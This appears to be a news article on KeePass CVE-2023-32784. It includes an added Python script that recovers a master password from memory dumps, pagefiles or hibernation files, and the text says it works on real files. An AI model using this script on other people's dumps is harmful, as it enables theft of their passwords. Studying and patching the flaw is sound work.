KeePass, the open-source password manager, has a vulnerability that lets anyone who can obtain a memory dump of the application recover the master password in cleartext.
A proof-of-concept tool is already publicly available, although no fix has been released yet. The flaw cannot be exploited remotely, however: the attacker needs a memory dump taken from the victim's machine.
The researchers noted that for a computer already infected by malware running with administrative privileges, this flaw changes little. It matters more for a user who fears that someone could gain physical access to the computer and perform forensic analysis on it.
In the worst case, an unauthorised party recovers the master password even though the KeePass workspace was locked or KeePass had already been closed.
The KeePass vulnerability in question is CVE-2023-32784.
According to the analysis, CVE-2023-32784 lies in SecureTextBoxEx, the custom text box KeePass uses for entering the master password and for other password fields while they are being edited.
For every character typed into that box, KeePass leaves a string behind in memory; because of how .NET manages strings, such residues are practically impossible to wipe once created. To use the PoC tool, an attacker needs a memory dump: a dump of the KeePass process, the system's swap (page) file, the hibernation file, or a dump of the entire system's RAM.
As the PoC explains, typing 'Password' leaves a series of residual strings, one per character entered. The PoC application searches the dump for those string patterns and offers a likely character for each position in the password.
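The recovery technique described above, as an added example that is neither the researcher's PoC tool nor KeePass code: it scans a constructed memory dump for runs of the password mask character followed by one real character, records the character for the position given by the run length, and takes a majority vote per position. Assumptions of this example: the mask character is U+25CF (BLACK CIRCLE), .NET strings are stored as UTF-16LE, and the first typed character leaves no residue (the shortest leftover string already reveals the second character), so position 0 is reported as '?'. The sample dump and the filler bytes around the residues are constructed for this example.

```python
from collections import Counter, defaultdict

# Assumption of this example: SecureTextBoxEx masks typed characters with
# U+25CF (BLACK CIRCLE), and .NET strings live in memory as UTF-16LE,
# so one mask character is the byte pair b"\xcf\x25".
MASK = "\u25cf"
MASK_BYTES = MASK.encode("utf-16-le")


def find_leftovers(dump: bytes):
    """Yield (position, char) for every residue of the form MASK*n + char.

    A run of n masks followed by one character means that character sits at
    0-based position n of the typed password (the first character never shows up).
    """
    i, n = 0, len(dump)
    while i + 1 < n:
        if dump[i:i + 2] != MASK_BYTES:
            i += 1
            continue
        j = i
        while j + 1 < n and dump[j:j + 2] == MASK_BYTES:
            j += 2
        run = (j - i) // 2
        if j + 1 < n:
            try:
                ch = dump[j:j + 2].decode("utf-16-le")
            except UnicodeDecodeError:  # lone surrogate or other junk after the run
                ch = ""
            if ch.isprintable():
                yield run, ch
        i = j + 2


def recover_password(dump: bytes) -> str:
    """Majority-vote one character per position; '?' where nothing was found."""
    by_pos = defaultdict(Counter)
    for pos, ch in find_leftovers(dump):
        by_pos[pos][ch] += 1
    if not by_pos:
        return ""
    length = max(by_pos) + 1
    return "".join(
        by_pos[p].most_common(1)[0][0] if p in by_pos else "?"
        for p in range(length)
    )


def build_sample_dump(password: str) -> bytes:
    """Constructed sample dump: the residues the page describes for a typed
    password, interleaved with unrelated data as in a real process dump."""
    chunks = [b"\x00" * 16, "unrelated .NET string".encode("utf-16-le")]
    for i in range(1, len(password)):          # no residue for the first character
        chunks.append((MASK * i + password[i]).encode("utf-16-le"))
        chunks.append(b"\x00\x00" + bytes([i]) + b"\xff")  # filler between allocations
    chunks.append(b"\x41" * 8)
    return b"".join(chunks)


if __name__ == "__main__":
    import sys
    # Usage: python keepass_residue.py <dump-file>; with no argument, run on the sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump("Password")
    print("candidate master password:", recover_password(data))
```

Against a real dump the same scan applies to a KeePass process dump, pagefile, hibernation file or full RAM image; conflicting candidates at one position (from corrections or several unlock attempts) show up in the per-position counters, which is why the vote is kept rather than taking the first hit.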
The KeePass developers have confirmed the flaw and are working on a fix. The vulnerability affects the KeePass 2.x branch on Windows, and possibly on macOS and Linux as well. The fix, expected to ship as KeePass 2.54, was due to roll out by July this year.
The concerning part is that a PoC tool is already public while no patch is available yet. Experts rate the likelihood of exploitation of CVE-2023-32784 as low, but it remains possible for attackers to build on the PoC and weaponise the flaw.
